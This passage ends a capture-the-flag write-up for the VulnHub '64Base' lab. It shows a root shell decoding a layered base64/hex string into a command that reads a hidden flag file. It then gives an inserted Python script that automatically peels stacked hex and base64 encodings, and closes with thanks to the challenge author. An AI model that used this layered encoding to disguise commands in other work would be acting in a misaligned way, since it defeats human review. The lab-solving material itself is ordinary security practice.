root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p | base64 -d | xxd -r -p | base64 -d
base64 -d /var/local/.luke|less.real
root@64base:~# base64 -d /var/local/.luke|less.real
-----SNIP-----
____________________________________________________________________________
  ______  ______  ______  ______  ______  ______  ______  ______
 |______||______||______||______||______||______||______||______||______|
  _   _   ____ __          __ __     __ ____   _    _  _  _____   ______
 | \ | | / __ \\ \        / / \ \   / // __ \ | |  | |( )|  __ \ |  ____|
 |  \| || |  | |\ \  /\  / /   \ \_/ /| |  | || |  | ||/ | |__) || |__
 | . ` || |  | | \ \/  \/ /     \   / | |  | || |  | |   |  _  / |  __|
 | |\  || |__| |  \  /\  /       | |  | |__| || |__| |   | | \ \ | |____
 |_| \_| \____/    \/  \/        |_|   \____/  \____/    |_|  \_\|______|
                                _  ______  _____  _____  _
             /\                | ||  ____||  __ \|_   _|| |
            /  \               | || |__   | |  | | | |  | |
           / /\ \          _   | ||  __|  | |  | | | |  | |
          / ____ \        | |__| || |____ | |__| |_| |_ |_|
         /_/    \_\        \____/ |______||_____/|_____|(_)
  ______  ______  ______  ______  ______  ______  ______  ______  ______
 |______||______||______||______||______||______||______||______||______|
                    I hope you enjoyed this challenge
                    Please leave comments & feedback
                    @ https://www.vulnhub.com/?q=64base
                    -----------------------------------
                    64Base Challenge by 3mrgnc3
                    https://3mrgnc3.ninja/challenges
                    -----------------------------------
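Every decoding step in this write-up (the flag1 hex, the three-part flag2 id string, the flag5 JPEG comment and the five-layer flag6 command above) is just hex and base64 stacked on top of each other. As an added example that is not part of the original write-up, this Python script peels such layers automatically and stops when the remainder is plain text; the alphabet regexes, the printable-text heuristic, the wrap_layers helper and the constructed flag6-style sample are my own, and the flag5 comment string is the one quoted above.

```python
import base64
import binascii
import re
import string

# Alphabet checks. Assumption (mine): a layer is a single token with at most
# surrounding whitespace, which is stripped before the test.
HEX_RE = re.compile(r'^[0-9a-fA-F]+$')
B64_RE = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')


def looks_printable(data: bytes) -> bool:
    """True when every byte is printable ASCII (text, not binary noise)."""
    try:
        text = data.decode('ascii')
    except UnicodeDecodeError:
        return False
    return all(ch in string.printable for ch in text)


def peel_layer(token: str):
    """Strip exactly one encoding layer.

    Returns (layer_name, decoded_text), or None when the token is neither
    clean hex nor clean base64 that decodes to printable text.
    Hex is tried first because every hex string is also made of base64
    alphabet characters; the printable check rejects the wrong reading.
    """
    s = token.strip()
    if HEX_RE.match(s) and len(s) % 2 == 0:
        raw = binascii.unhexlify(s)
        if looks_printable(raw):
            return 'hex', raw.decode('ascii')
    if B64_RE.match(s) and len(s) % 4 == 0:
        try:
            raw = base64.b64decode(s, validate=True)
        except (binascii.Error, ValueError):
            return None
        if looks_printable(raw):
            return 'base64', raw.decode('ascii')
    return None


def peel_all(token: str, max_layers: int = 16):
    """Peel layers until the remainder is plain text (or max_layers is hit).

    Returns (layers, text): layer names outermost first, and the final text
    with surrounding whitespace removed (the chains above end in a newline).
    """
    layers = []
    current = token
    for _ in range(max_layers):
        step = peel_layer(current)
        if step is None:
            break
        name, current = step
        layers.append(name)
    return layers, current.strip()


def wrap_layers(text: str, pattern) -> str:
    """Re-encode text with the given layers, innermost first (sample builder)."""
    data = text.encode('ascii')
    for name in pattern:
        data = binascii.hexlify(data) if name == 'hex' else base64.b64encode(data)
    return data.decode('ascii')


# Sample inputs. FLAG5_COMMENT is the JPEG comment quoted in the write-up.
# FLAG6_LIKE is constructed here: the command the flag6 chain ended in,
# wrapped in the same base64/hex/base64/hex/base64 layering as that chain.
FLAG5_COMMENT = 'TG9vayBJbnNpZGUhIDpECg=='
FLAG6_LIKE = wrap_layers('base64 -d /var/local/.luke|less.real\n',
                         ['base64', 'hex', 'base64', 'hex', 'base64'])

if __name__ == '__main__':
    for sample in (FLAG5_COMMENT, FLAG6_LIKE):
        layers, text = peel_all(sample)
        print(f'{len(layers)} layer(s) {layers} -> {text!r}')
```

A string that is neither hex nor base64 (a decoded flag with braces, a shell command with spaces) comes back untouched with an empty layer list, so the function never "decodes" plain text into garbage.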

Conclusion

This was an awesome challenge with a lot of tricks up its sleeve.
Whenever I thought I was on the right track I hit a dead end. After a while it felt like a maze in which I needed to find my way.
A great job of building this challenge, and many thanks to 3mrgnc3 and vulnhub.com.
Can’t wait for the next challenge.
 
 
 
 
 
 
 
 
 
 
 
